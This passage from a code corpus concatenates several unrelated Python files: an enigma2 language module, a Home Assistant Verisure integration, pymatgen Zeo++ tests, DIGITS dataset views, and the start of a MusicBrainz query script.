self.callbacks.append(callback)
def delLanguage(self, delLang = None):
from Components.config import config, configfile
from shutil import rmtree
lang = config.osd.language.value
if delLang:
print"DELETE LANG", delLang
if delLang == "en_US" or delLang == "de_DE":
print"Default Language can not be deleted !!"
return
elif delLang == "en_GB" or delLang == "pt_BR":
delLang = delLang.lower()
delLang = delLang.replace('_','-')
os.system("opkg remove --autoremove --force-depends " + Lpackagename + delLang)
else:
os.system("opkg remove --autoremove --force-depends " + Lpackagename + delLang[:2])
else:
print"Delete all lang except ", lang
ll = os.listdir(LPATH)
for x in ll:
if len(x) > 2:
if x != lang and x != "de":
x = x.lower()
x = x.replace('_','-')
os.system("opkg remove --autoremove --force-depends " + Lpackagename + x)
else:
if x != lang[:2] and x != "en" and x != "de":
os.system("opkg remove --autoremove --force-depends " + Lpackagename + x)
elif x == "pt":
if x != lang:
os.system("opkg remove --autoremove --force-depends " + Lpackagename + x)
os.system("touch /etc/enigma2/.removelang")
self.InitLang()
def updateLanguageCache(self):
t = localtime(time())
createdate = strftime("%d.%m.%Y %H:%M:%S", t)
f = open('/usr/lib/enigma2/python/Components/Language_cache.py','w')
f.write('# -*- coding: UTF-8 -*-\n')
f.write('# date: ' + createdate + '\n#\n\n')
f.write('LANG_TEXT = {\n')
for lang in self.langlist:
catalog = gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[str(lang)], fallback=True)
T1 = catalog.gettext("Please use the UP and DOWN keys to select your language. Afterwards press the OK button.")
T2 = catalog.gettext("Language selection")
T3 = catalog.gettext("Cancel")
T4 = catalog.gettext("Save")
f.write('"' + lang + '"' + ': {\n')
f.write('\t "T1"' + ': "' + T1 + '",\n')
f.write('\t "T2"' + ': "' + T2 + '",\n')
f.write('\t "T3"' + ': "' + T3 + '",\n')
f.write('\t "T4"' + ': "' + T4 + '",\n')
f.write('},\n')
f.write('}\n')
f.close
# NOTE(review): these two module-level names look unused within this file —
# confirm no external importer relies on them before removing.
catalog = None
lang = None
# Module-wide singleton used throughout enigma2.
language = Language()
| wetek-enigma/enigma2 | lib/python/Components/Language.py | Python | gpl-2.0 | 7,837 |
"""
components.verisure
~~~~~~~~~~~~~~~~~~~
Provides support for verisure components.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/verisure/
"""
import logging
import time
from datetime import timedelta
from homeassistant import bootstrap
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, CONF_PASSWORD, CONF_USERNAME,
EVENT_PLATFORM_DISCOVERED)
from homeassistant.helpers import validate_config
from homeassistant.loader import get_component
from homeassistant.util import Throttle
DOMAIN = "verisure"

# Discovery identifiers fired via EVENT_PLATFORM_DISCOVERED for each platform.
DISCOVER_SENSORS = 'verisure.sensors'
DISCOVER_SWITCHES = 'verisure.switches'
DISCOVER_ALARMS = 'verisure.alarm_control_panel'
DISCOVER_LOCKS = 'verisure.lock'

DEPENDENCIES = ['alarm_control_panel']
REQUIREMENTS = ['vsure==0.5.1']

_LOGGER = logging.getLogger(__name__)

# Module-level state shared between setup() and the per-platform pollers;
# MY_PAGES and the error classes are populated by setup().
MY_PAGES = None

ALARM_STATUS = {}
SMARTPLUG_STATUS = {}
CLIMATE_STATUS = {}
LOCK_STATUS = {}
MOUSEDETECTION_STATUS = {}

VERISURE_LOGIN_ERROR = None
VERISURE_ERROR = None

# Feature toggles; overwritten from user configuration in setup().
SHOW_THERMOMETERS = True
SHOW_HYGROMETERS = True
SHOW_ALARM = True
SHOW_SMARTPLUGS = True
SHOW_LOCKS = True
SHOW_MOUSEDETECTION = True
CODE_DIGITS = 4

# if wrong password was given don't try again
WRONG_PASSWORD_GIVEN = False

MIN_TIME_BETWEEN_REQUESTS = timedelta(seconds=1)
def setup(hass, config):
    """ Setup the Verisure component.

    Validates configuration, logs in to Verisure MyPages, primes all status
    caches once, then loads and fires discovery for the supported platforms.
    Returns False on config/login failure, True on success.
    """
    if not validate_config(config,
                           {DOMAIN: [CONF_USERNAME, CONF_PASSWORD]},
                           _LOGGER):
        return False

    # Imported here (not at module level) so the REQUIREMENTS package only
    # needs to be installed when the component is actually configured.
    from verisure import MyPages, LoginError, Error

    global SHOW_THERMOMETERS, SHOW_HYGROMETERS,\
        SHOW_ALARM, SHOW_SMARTPLUGS, SHOW_LOCKS, SHOW_MOUSEDETECTION,\
        CODE_DIGITS
    # Every toggle defaults to enabled ('1') when not configured.
    SHOW_THERMOMETERS = int(config[DOMAIN].get('thermometers', '1'))
    SHOW_HYGROMETERS = int(config[DOMAIN].get('hygrometers', '1'))
    SHOW_ALARM = int(config[DOMAIN].get('alarm', '1'))
    SHOW_SMARTPLUGS = int(config[DOMAIN].get('smartplugs', '1'))
    SHOW_LOCKS = int(config[DOMAIN].get('locks', '1'))
    SHOW_MOUSEDETECTION = int(config[DOMAIN].get('mouse', '1'))
    CODE_DIGITS = int(config[DOMAIN].get('code_digits', '4'))

    global MY_PAGES
    MY_PAGES = MyPages(
        config[DOMAIN][CONF_USERNAME],
        config[DOMAIN][CONF_PASSWORD])
    # Export the error classes so module-level helpers can catch them without
    # importing verisure themselves.
    global VERISURE_LOGIN_ERROR, VERISURE_ERROR
    VERISURE_LOGIN_ERROR = LoginError
    VERISURE_ERROR = Error

    try:
        MY_PAGES.login()
    except (ConnectionError, Error) as ex:
        _LOGGER.error('Could not log in to verisure mypages, %s', ex)
        return False

    # Prime all status caches once before the platforms are set up.
    update_alarm()
    update_climate()
    update_smartplug()
    update_lock()
    update_mousedetection()

    # Load components for the devices in the ISY controller that we support
    for comp_name, discovery in ((('sensor', DISCOVER_SENSORS),
                                  ('switch', DISCOVER_SWITCHES),
                                  ('alarm_control_panel', DISCOVER_ALARMS),
                                  ('lock', DISCOVER_LOCKS))):
        component = get_component(comp_name)
        _LOGGER.info(config[DOMAIN])
        bootstrap.setup_component(hass, component.DOMAIN, config)
        hass.bus.fire(EVENT_PLATFORM_DISCOVERED,
                      {ATTR_SERVICE: discovery,
                       ATTR_DISCOVERED: {}})

    return True
def reconnect():
    """ Reconnect to verisure mypages. """
    global WRONG_PASSWORD_GIVEN
    try:
        # Short pause before retrying so we do not hammer the service.
        time.sleep(1)
        MY_PAGES.login()
    except VERISURE_LOGIN_ERROR as err:
        _LOGGER.error("Could not login to Verisure mypages, %s", err)
        # Credentials are wrong: remember it so pollers stop retrying.
        WRONG_PASSWORD_GIVEN = True
    except (ConnectionError, VERISURE_ERROR) as err:
        _LOGGER.error("Could not login to Verisure mypages, %s", err)
@Throttle(MIN_TIME_BETWEEN_REQUESTS)
def update_alarm():
    """ Updates the status of alarms. """
    update_component(MY_PAGES.alarm.get, ALARM_STATUS)
@Throttle(MIN_TIME_BETWEEN_REQUESTS)
def update_climate():
    """ Updates the status of climate sensors. """
    update_component(MY_PAGES.climate.get, CLIMATE_STATUS)
@Throttle(MIN_TIME_BETWEEN_REQUESTS)
def update_smartplug():
    """ Updates the status of smartplugs. """
    update_component(MY_PAGES.smartplug.get, SMARTPLUG_STATUS)
# NOTE(review): unlike the pollers above, this one is not wrapped in
# @Throttle(MIN_TIME_BETWEEN_REQUESTS) — confirm whether that is intentional.
def update_lock():
    """ Updates the status of locks. """
    update_component(MY_PAGES.lock.get, LOCK_STATUS)
# NOTE(review): also missing @Throttle(MIN_TIME_BETWEEN_REQUESTS) — confirm.
def update_mousedetection():
    """ Updates the status of mouse detectors. """
    update_component(MY_PAGES.mousedetection.get, MOUSEDETECTION_STATUS)
def update_component(get_function, status):
    """ Updates the status of verisure components.

    Calls *get_function* and stores each returned overview object in the
    *status* dict, keyed on its ``id`` (falling back to ``deviceLabel``).
    Reconnects on connection/API errors; does nothing after a bad password.
    """
    if WRONG_PASSWORD_GIVEN:
        _LOGGER.error('Wrong password')
        return
    try:
        for overview in get_function():
            try:
                key = overview.id
            except AttributeError:
                # Some device types expose deviceLabel instead of id.
                key = overview.deviceLabel
            status[key] = overview
    except (ConnectionError, VERISURE_ERROR) as ex:
        _LOGGER.error('Caught connection error %s, tries to reconnect', ex)
        reconnect()
| nnic/home-assistant | homeassistant/components/verisure.py | Python | mit | 5,074 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
__author__ = "Bharat Medasani"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "bkmedasani@lbl.gov"
__date__ = "Aug 2, 2013"
import os
import re
import unittest
from pymatgen.analysis.bond_valence import BVAnalyzer
from pymatgen.core.periodic_table import Species
from pymatgen.core.structure import Molecule, Structure
from pymatgen.io.cif import CifParser
from pymatgen.io.vasp.inputs import Poscar
from pymatgen.io.zeopp import (
ZeoCssr,
ZeoVoronoiXYZ,
get_free_sphere_params,
get_high_accuracy_voronoi_nodes,
get_void_volume_surfarea,
get_voronoi_nodes,
)
from pymatgen.util.testing import PymatgenTest
try:
import zeo
except ImportError:
zeo = None
@unittest.skipIf(not zeo, "zeo not present.")
class ZeoCssrTest(unittest.TestCase):
    """Round-trip tests for the Zeo++ CSSR writer/reader (no oxidation states)."""

    def setUp(self):
        filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
        p = Poscar.from_file(filepath)
        self.zeocssr = ZeoCssr(p.structure)

    def test_str(self):
        # Note: ZeoCssr rotates the lattice, so the header is b c a of the POSCAR.
        expected_string = """4.7595 10.4118 6.0672
90.00 90.00 90.00 SPGR = 1 P 1 OPT = 1
24 0
0 Fe4 P4 O16
1 Fe 0.4749 0.2187 0.7500 0 0 0 0 0 0 0 0 0.0000
2 Fe 0.9749 0.2813 0.2500 0 0 0 0 0 0 0 0 0.0000
3 Fe 0.0251 0.7187 0.7500 0 0 0 0 0 0 0 0 0.0000
4 Fe 0.5251 0.7813 0.2500 0 0 0 0 0 0 0 0 0.0000
5 P 0.4182 0.0946 0.2500 0 0 0 0 0 0 0 0 0.0000
6 P 0.9182 0.4054 0.7500 0 0 0 0 0 0 0 0 0.0000
7 P 0.0818 0.5946 0.2500 0 0 0 0 0 0 0 0 0.0000
8 P 0.5818 0.9054 0.7500 0 0 0 0 0 0 0 0 0.0000
9 O 0.7071 0.0434 0.7500 0 0 0 0 0 0 0 0 0.0000
10 O 0.7413 0.0966 0.2500 0 0 0 0 0 0 0 0 0.0000
11 O 0.2854 0.1657 0.0461 0 0 0 0 0 0 0 0 0.0000
12 O 0.2854 0.1657 0.4539 0 0 0 0 0 0 0 0 0.0000
13 O 0.7854 0.3343 0.5461 0 0 0 0 0 0 0 0 0.0000
14 O 0.7854 0.3343 0.9539 0 0 0 0 0 0 0 0 0.0000
15 O 0.2413 0.4034 0.7500 0 0 0 0 0 0 0 0 0.0000
16 O 0.2071 0.4566 0.2500 0 0 0 0 0 0 0 0 0.0000
17 O 0.7929 0.5434 0.7500 0 0 0 0 0 0 0 0 0.0000
18 O 0.7587 0.5966 0.2500 0 0 0 0 0 0 0 0 0.0000
19 O 0.2146 0.6657 0.0461 0 0 0 0 0 0 0 0 0.0000
20 O 0.2146 0.6657 0.4539 0 0 0 0 0 0 0 0 0.0000
21 O 0.7146 0.8343 0.5461 0 0 0 0 0 0 0 0 0.0000
22 O 0.7146 0.8343 0.9539 0 0 0 0 0 0 0 0 0.0000
23 O 0.2587 0.9034 0.7500 0 0 0 0 0 0 0 0 0.0000
24 O 0.2929 0.9566 0.2500 0 0 0 0 0 0 0 0 0.0000"""
        self.assertEqual(str(self.zeocssr), expected_string)

    def test_from_file(self):
        filename = os.path.join(PymatgenTest.TEST_FILES_DIR, "EDI.cssr")
        zeocssr = ZeoCssr.from_file(filename)
        self.assertIsInstance(zeocssr.structure, Structure)
# @unittest.skipIf(not zeo, "zeo not present.")
class ZeoCssrOxiTest(unittest.TestCase):
    """CSSR round-trip with BV-assigned oxidation states in the species labels.

    NOTE(review): the zeo skipIf decorator above this class is commented out —
    presumably ZeoCssr itself does not need the zeo package; confirm.
    """

    def setUp(self):
        filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
        p = Poscar.from_file(filepath)
        structure = BVAnalyzer().get_oxi_state_decorated_structure(p.structure)
        self.zeocssr = ZeoCssr(structure)

    def test_str(self):
        expected_string = """4.7595 10.4118 6.0672
90.00 90.00 90.00 SPGR = 1 P 1 OPT = 1
24 0
0 Fe4 P4 O16
1 Fe3+ 0.4749 0.2187 0.7500 0 0 0 0 0 0 0 0 0.0000
2 Fe3+ 0.9749 0.2813 0.2500 0 0 0 0 0 0 0 0 0.0000
3 Fe3+ 0.0251 0.7187 0.7500 0 0 0 0 0 0 0 0 0.0000
4 Fe3+ 0.5251 0.7813 0.2500 0 0 0 0 0 0 0 0 0.0000
5 P5+ 0.4182 0.0946 0.2500 0 0 0 0 0 0 0 0 0.0000
6 P5+ 0.9182 0.4054 0.7500 0 0 0 0 0 0 0 0 0.0000
7 P5+ 0.0818 0.5946 0.2500 0 0 0 0 0 0 0 0 0.0000
8 P5+ 0.5818 0.9054 0.7500 0 0 0 0 0 0 0 0 0.0000
9 O2- 0.7071 0.0434 0.7500 0 0 0 0 0 0 0 0 0.0000
10 O2- 0.7413 0.0966 0.2500 0 0 0 0 0 0 0 0 0.0000
11 O2- 0.2854 0.1657 0.0461 0 0 0 0 0 0 0 0 0.0000
12 O2- 0.2854 0.1657 0.4539 0 0 0 0 0 0 0 0 0.0000
13 O2- 0.7854 0.3343 0.5461 0 0 0 0 0 0 0 0 0.0000
14 O2- 0.7854 0.3343 0.9539 0 0 0 0 0 0 0 0 0.0000
15 O2- 0.2413 0.4034 0.7500 0 0 0 0 0 0 0 0 0.0000
16 O2- 0.2071 0.4566 0.2500 0 0 0 0 0 0 0 0 0.0000
17 O2- 0.7929 0.5434 0.7500 0 0 0 0 0 0 0 0 0.0000
18 O2- 0.7587 0.5966 0.2500 0 0 0 0 0 0 0 0 0.0000
19 O2- 0.2146 0.6657 0.0461 0 0 0 0 0 0 0 0 0.0000
20 O2- 0.2146 0.6657 0.4539 0 0 0 0 0 0 0 0 0.0000
21 O2- 0.7146 0.8343 0.5461 0 0 0 0 0 0 0 0 0.0000
22 O2- 0.7146 0.8343 0.9539 0 0 0 0 0 0 0 0 0.0000
23 O2- 0.2587 0.9034 0.7500 0 0 0 0 0 0 0 0 0.0000
24 O2- 0.2929 0.9566 0.2500 0 0 0 0 0 0 0 0 0.0000"""
        self.assertEqual(str(self.zeocssr), expected_string)

    def test_from_file(self):
        filename = os.path.join(PymatgenTest.TEST_FILES_DIR, "EDI_oxistate_decorated.cssr")
        zeocssr = ZeoCssr.from_file(filename)
        self.assertIsInstance(zeocssr.structure, Structure)
@unittest.skipIf(not zeo, "zeo not present.")
class ZeoVoronoiXYZTest(unittest.TestCase):
    """Tests for the Zeo++ Voronoi XYZ writer/reader (coords + voronoi radii)."""

    def setUp(self):
        # CH4 molecule with per-site voronoi_radius properties.
        coords = [
            [0.000000, 0.000000, 0.000000],
            [0.000000, 0.000000, 1.089000],
            [1.026719, 0.000000, -0.363000],
            [-0.513360, -0.889165, -0.363000],
            [-0.513360, 0.889165, -0.363000],
        ]
        prop = [0.4, 0.2, 0.2, 0.2, 0.2]
        self.mol = Molecule(["C", "H", "H", "H", "H"], coords, site_properties={"voronoi_radius": prop})
        self.xyz = ZeoVoronoiXYZ(self.mol)

    def test_str(self):
        ans = """5
H4 C1
C 0.000000 0.000000 0.000000 0.400000
H 1.089000 0.000000 0.000000 0.200000
H -0.363000 1.026719 0.000000 0.200000
H -0.363000 -0.513360 -0.889165 0.200000
H -0.363000 -0.513360 0.889165 0.200000"""
        # Bug fix: the assertion was duplicated on two consecutive lines;
        # a single check is sufficient (str() has no side effects to re-test).
        self.assertEqual(str(self.xyz), ans)

    def test_from_file(self):
        filename = os.path.join(PymatgenTest.TEST_FILES_DIR, "EDI_voro.xyz")
        vor = ZeoVoronoiXYZ.from_file(filename)
        self.assertIsInstance(vor.molecule, Molecule)
@unittest.skipIf(not zeo, "zeo not present.")
class GetVoronoiNodesTest(unittest.TestCase):
    """Smoke test for get_voronoi_nodes using BV-derived ionic radii."""

    def setUp(self):
        filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
        p = Poscar.from_file(filepath)
        self.structure = p.structure
        bv = BVAnalyzer()
        valences = bv.get_valences(self.structure)
        el = [site.species_string for site in self.structure.sites]
        valence_dict = dict(zip(el, valences))
        # Map each species string to its ionic radius for Zeo++.
        self.rad_dict = {}
        for k, v in valence_dict.items():
            self.rad_dict[k] = float(Species(k, v).ionic_radius)
        assert len(self.rad_dict) == len(self.structure.composition)

    def test_get_voronoi_nodes(self):
        (
            vor_node_struct,
            vor_edge_center_struct,
            vor_face_center_struct,
        ) = get_voronoi_nodes(self.structure, self.rad_dict)
        # Only type checks: the exact node sets depend on the zeo version.
        self.assertIsInstance(vor_node_struct, Structure)
        self.assertIsInstance(vor_edge_center_struct, Structure)
        self.assertIsInstance(vor_face_center_struct, Structure)
        print(len(vor_node_struct.sites))
        print(len(vor_face_center_struct.sites))
@unittest.skip("file free_sph.cif not present")
class GetFreeSphereParamsTest(unittest.TestCase):
    """Free-sphere diameter checks (skipped: fixture file is missing)."""

    def setUp(self):
        filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "free_sph.cif")
        self.structure = Structure.from_file(filepath)
        # Hand-picked ionic radii (Angstrom) for this particular structure.
        self.rad_dict = {
            "Ge": 0.67,
            "P": 0.52,
            "S": 1.7,
            "La": 1.17,
            "Zr": 0.86,
            "O": 1.26,
        }

    def test_get_free_sphere_params(self):
        free_sph_params = get_free_sphere_params(self.structure, rad_dict=self.rad_dict)
        # Zeo results can change in future. Hence loose comparison
        self.assertAlmostEqual(free_sph_params["inc_sph_max_dia"], 2.58251, places=1)
        self.assertAlmostEqual(free_sph_params["free_sph_max_dia"], 1.29452, places=1)
        self.assertAlmostEqual(free_sph_params["inc_sph_along_free_sph_path_max_dia"], 2.58251, places=1)
@unittest.skipIf(not zeo, "zeo not present.")
class GetHighAccuracyVoronoiNodesTest(unittest.TestCase):
    """Smoke test for the high-accuracy Voronoi node generator."""

    def setUp(self):
        filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
        p = Poscar.from_file(filepath)
        self.structure = p.structure
        bv = BVAnalyzer()
        valences = bv.get_valences(self.structure)
        el = [site.species_string for site in self.structure.sites]
        valence_dict = dict(zip(el, valences))
        self.rad_dict = {}
        for k, v in valence_dict.items():
            self.rad_dict[k] = float(Species(k, v).ionic_radius)
        assert len(self.rad_dict) == len(self.structure.composition)

    def test_get_voronoi_nodes(self):
        # vor_node_struct, vor_ec_struct, vor_fc_struct = \
        #    get_high_accuracy_voronoi_nodes(self.structure, self.rad_dict)
        # High-accuracy variant returns only the node structure.
        vor_node_struct = get_high_accuracy_voronoi_nodes(self.structure, self.rad_dict)
        self.assertIsInstance(vor_node_struct, Structure)
        # self.assertIsInstance(vor_ec_struct, Structure)
        # self.assertIsInstance(vor_fc_struct, Structure)
        print(len(vor_node_struct.sites))
        # print(len(vor_fc_struct.sites))
@unittest.skipIf(not zeo, "zeo not present.")
class GetVoronoiNodesMultiOxiTest(unittest.TestCase):
    """Voronoi node generation on an oxidation-state-decorated structure."""

    def setUp(self):
        filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
        p = Poscar.from_file(filepath)
        self.structure = p.structure
        bv = BVAnalyzer()
        self.structure = bv.get_oxi_state_decorated_structure(self.structure)
        valences = bv.get_valences(self.structure)
        # Build radii positionally so each decorated species gets its radius.
        radii = []
        for i in range(len(valences)):
            el = self.structure.sites[i].specie.symbol
            radius = Species(el, valences[i]).ionic_radius
            radii.append(radius)
        el = [site.species_string for site in self.structure.sites]
        self.rad_dict = dict(zip(el, radii))
        for el in self.rad_dict.keys():
            print((el, self.rad_dict[el].real))

    def test_get_voronoi_nodes(self):
        (
            vor_node_struct,
            vor_edge_center_struct,
            vor_face_center_struct,
        ) = get_voronoi_nodes(self.structure, self.rad_dict)
        self.assertIsInstance(vor_node_struct, Structure)
        self.assertIsInstance(vor_edge_center_struct, Structure)
        self.assertIsInstance(vor_face_center_struct, Structure)
@unittest.skip("The function is deprecated")
class GetVoidVolumeSurfaceTest(unittest.TestCase):
    """Void volume / surface area of a Li2O vacancy (deprecated API, skipped)."""

    def setUp(self):
        filepath1 = os.path.join(PymatgenTest.TEST_FILES_DIR, "Li2O.cif")
        p = CifParser(filepath1).get_structures(False)[0]
        bv = BVAnalyzer()
        valences = bv.get_valences(p)
        el = [site.species_string for site in p.sites]
        val_dict = dict(zip(el, valences))
        self._radii = {}
        for k, v in val_dict.items():
            # Strip charge decorations ("Li1+" -> "Li") before the radius lookup.
            k1 = re.sub(r"[1-9,+,\-]", "", k)
            self._radii[k1] = float(Species(k1, v).ionic_radius)
        # Remove one site to create the vacancy whose void is measured.
        p.remove(0)
        self._vac_struct = p

    def test_void_volume_surface_area(self):
        # Bug fix: a stray dead `pass` statement preceded the live test body.
        vol, sa = get_void_volume_surfarea(self._vac_struct, self._radii)
        # print "vol: ", vol, "sa: ", sa
        self.assertIsInstance(vol, float)
        self.assertIsInstance(sa, float)
if __name__ == "__main__":
    # Allow running this test module directly with `python test_zeopp.py`.
    unittest.main()
| gmatteo/pymatgen | pymatgen/io/tests/test_zeopp.py | Python | mit | 11,239 |
../../../../../share/pyshared/twisted/test/reflect_helper_IE.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/twisted/test/reflect_helper_IE.py | Python | gpl-3.0 | 63 |
# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.
import os
import flask
from digits import utils
from digits.utils.routing import request_wants_json
from digits.webapp import app, scheduler, autodoc
from digits.dataset import tasks
from forms import ImageClassificationDatasetForm
from job import ImageClassificationDatasetJob
from digits.base_workspace import *
NAMESPACE = '/datasets/images/classification'
def from_folders(job, form):
    """
    Add tasks for creating a dataset by parsing folders of images

    Arguments:
    job -- the ImageClassificationDatasetJob the tasks are appended to
    form -- a validated ImageClassificationDatasetForm with folder options
    """
    job.labels_file = utils.constants.LABELS_FILE

    ### Add ParseFolderTask

    # When a dedicated val/test folder is supplied, no percentage is split
    # off the training folder (the split percentage is forced to 0).
    percent_val = form.folder_pct_val.data
    val_parents = []
    if form.has_val_folder.data:
        percent_val = 0
    percent_test = form.folder_pct_test.data
    test_parents = []
    if form.has_test_folder.data:
        percent_test = 0
    parse_train_task = tasks.ParseFolderTask(
        job_dir = job.dir(),
        folder = form.folder_train.data,
        percent_val = percent_val,
        percent_test = percent_test,
        )
    job.tasks.append(parse_train_task)

    # set parents
    if not form.has_val_folder.data:
        val_parents = [parse_train_task]
    if not form.has_test_folder.data:
        test_parents = [parse_train_task]

    if form.has_val_folder.data:
        # Separate val folder: parse it entirely as validation data.
        parse_val_task = tasks.ParseFolderTask(
            job_dir = job.dir(),
            parents = parse_train_task,
            folder = form.folder_val.data,
            percent_val = 100,
            percent_test = 0,
            )
        job.tasks.append(parse_val_task)
        val_parents = [parse_val_task]

    if form.has_test_folder.data:
        # Separate test folder: parse it entirely as test data.
        parse_test_task = tasks.ParseFolderTask(
            job_dir = job.dir(),
            parents = parse_train_task,
            folder = form.folder_test.data,
            percent_val = 0,
            percent_test = 100,
            )
        job.tasks.append(parse_test_task)
        test_parents = [parse_test_task]

    ### Add CreateDbTasks

    encoding = form.encoding.data
    # The mean file is only computed for the training database.
    job.tasks.append(
        tasks.CreateDbTask(
            job_dir = job.dir(),
            parents = parse_train_task,
            input_file = utils.constants.TRAIN_FILE,
            db_name = utils.constants.TRAIN_DB,
            image_dims = job.image_dims,
            resize_mode = job.resize_mode,
            encoding = encoding,
            mean_file = utils.constants.MEAN_FILE_CAFFE,
            labels_file = job.labels_file,
            )
        )

    if percent_val > 0 or form.has_val_folder.data:
        job.tasks.append(
            tasks.CreateDbTask(
                job_dir = job.dir(),
                parents = val_parents,
                input_file = utils.constants.VAL_FILE,
                db_name = utils.constants.VAL_DB,
                image_dims = job.image_dims,
                resize_mode = job.resize_mode,
                encoding = encoding,
                labels_file = job.labels_file,
                )
            )

    if percent_test > 0 or form.has_test_folder.data:
        job.tasks.append(
            tasks.CreateDbTask(
                job_dir = job.dir(),
                parents = test_parents,
                input_file = utils.constants.TEST_FILE,
                db_name = utils.constants.TEST_DB,
                image_dims = job.image_dims,
                resize_mode = job.resize_mode,
                encoding = encoding,
                labels_file = job.labels_file,
                )
            )
def from_files(job, form):
    """
    Add tasks for creating a dataset by reading textfiles

    Saves the uploaded label/train/val/test listing files into the job
    directory, then appends one CreateDbTask per requested database.
    """
    ### labels
    flask.request.files[form.textfile_labels_file.name].save(
        os.path.join(job.dir(), utils.constants.LABELS_FILE)
        )
    job.labels_file = utils.constants.LABELS_FILE

    encoding = form.encoding.data
    shuffle = bool(form.textfile_shuffle.data)

    ### train
    flask.request.files[form.textfile_train_images.name].save(
        os.path.join(job.dir(), utils.constants.TRAIN_FILE)
        )
    # An empty folder field means the listing file contains absolute paths.
    image_folder = form.textfile_train_folder.data.strip()
    if not image_folder:
        image_folder = None

    job.tasks.append(
        tasks.CreateDbTask(
            job_dir = job.dir(),
            input_file = utils.constants.TRAIN_FILE,
            db_name = utils.constants.TRAIN_DB,
            image_dims = job.image_dims,
            image_folder= image_folder,
            resize_mode = job.resize_mode,
            encoding = encoding,
            mean_file = utils.constants.MEAN_FILE_CAFFE,
            labels_file = job.labels_file,
            shuffle = shuffle,
            )
        )

    ### val
    if form.textfile_use_val.data:
        flask.request.files[form.textfile_val_images.name].save(
            os.path.join(job.dir(), utils.constants.VAL_FILE)
            )
        image_folder = form.textfile_val_folder.data.strip()
        if not image_folder:
            image_folder = None

        job.tasks.append(
            tasks.CreateDbTask(
                job_dir = job.dir(),
                input_file = utils.constants.VAL_FILE,
                db_name = utils.constants.VAL_DB,
                image_dims = job.image_dims,
                image_folder= image_folder,
                resize_mode = job.resize_mode,
                encoding = encoding,
                labels_file = job.labels_file,
                shuffle = shuffle,
                )
            )

    ### test
    if form.textfile_use_test.data:
        flask.request.files[form.textfile_test_images.name].save(
            os.path.join(job.dir(), utils.constants.TEST_FILE)
            )
        image_folder = form.textfile_test_folder.data.strip()
        if not image_folder:
            image_folder = None

        job.tasks.append(
            tasks.CreateDbTask(
                job_dir = job.dir(),
                input_file = utils.constants.TEST_FILE,
                db_name = utils.constants.TEST_DB,
                image_dims = job.image_dims,
                image_folder= image_folder,
                resize_mode = job.resize_mode,
                encoding = encoding,
                labels_file = job.labels_file,
                shuffle = shuffle,
                )
            )
@app.route(NAMESPACE + '/new', methods=['GET'])
@autodoc('datasets')
def image_classification_dataset_new():
    """
    Returns a form for a new ImageClassificationDatasetJob
    """
    workspace = get_workspace_details(flask.request.url)
    # NOTE(review): stray debug print left in the request path -- consider
    # removing or routing through app.logger.
    print "workspace is ", workspace
    form = ImageClassificationDatasetForm()
    return flask.render_template('datasets/images/classification/new.html', form=form, workspace = workspace)
@app.route(NAMESPACE + '.json', methods=['POST'])
@app.route(NAMESPACE, methods=['POST'])
@autodoc(['datasets', 'api'])
def image_classification_dataset_create():
    """
    Creates a new ImageClassificationDatasetJob
    Returns JSON when requested: {job_id,name,status} or {errors:[]}
    """
    workspace = get_workspace_details(flask.request.url)
    form = ImageClassificationDatasetForm()
    # Validation failure: JSON error payload for API clients, otherwise
    # re-render the form with inline errors (both with HTTP 400).
    if not form.validate_on_submit():
        if request_wants_json():
            return flask.jsonify({'errors': form.errors}), 400
        else:
            return flask.render_template('datasets/images/classification/new.html', form=form, workspace = workspace), 400
    job = None
    try:
        job = ImageClassificationDatasetJob(
                name = form.dataset_name.data,
                image_dims = (
                    int(form.resize_height.data),
                    int(form.resize_width.data),
                    int(form.resize_channels.data),
                    ),
                resize_mode = form.resize_mode.data,
                workspace = workspace,
                )
        # Populate job.tasks according to the chosen input method.
        if form.method.data == 'folder':
            from_folders(job, form)
        elif form.method.data == 'textfile':
            from_files(job, form)
        scheduler.add_job(job)
        if request_wants_json():
            return flask.jsonify(job.json_dict())
        else:
            return flask.redirect(flask.url_for('datasets_show', job_id=job.id())+'?workspace='+workspace['workspace_hash'])
    except:
        # Remove the partially-created job before re-raising so no orphaned
        # job directory is left behind.
        if job:
            scheduler.delete_job(job)
        raise
def show(job, *args):
    """Render the dataset "show" page.

    Called from digits.dataset.views.datasets_show(); the first extra
    positional argument is the workspace descriptor.
    """
    workspace = args[0]
    template = 'datasets/images/classification/show.html'
    return flask.render_template(template, job=job, workspace=workspace)
| DESHRAJ/DIGITS | digits/dataset/images/classification/views.py | Python | bsd-3-clause | 9,125 |
# To experiment with this code freely you will have to run this code locally.
# We have provided an example json output here for you to look at,
# but you will not be able to run any queries through our UI.
# Importing the needed libraries
import json
import requests
# Base endpoint for MusicBrainz artist lookups.  query_site() appends the
# artist MBID and the query parameters, so this must be the bare collection
# URL.
# BUG FIX: the original value started with a stray space and pointed at one
# specific artist with '?inc=aliases&fmt=json' baked in, which broke every
# URL that query_site()/query_by_name() built from it.
URL = "http://musicbrainz.org/ws/2/artist/"

# Canned parameter sets selecting which extra data ("inc") to request.
query_type = {  "simple": {},
                "atr": {"inc": "aliases+tags+ratings"},
                "aliases": {"inc": "aliases"},
                "releases": {"inc": "releases"}}
def query_site(url, params, uid="", fmt="json"):
params["fmt"] = fmt
r = requests.get(url + uid, params=params)
print "requesting", r.url
if r.status_code == requests.codes.ok:
return r.json()
else:
r.raise_for_status()
def query_by_name(url, params, name):
    """Run an artist search for *name* by adding a Lucene 'query' param."""
    params["query"] = "artist:{0}".format(name)
    return query_site(url, params)
def pretty_print(data, indent=4):
if type(data) == dict:
print json.dumps(data, indent=indent, sort_keys=True)
else:
print data
def main():
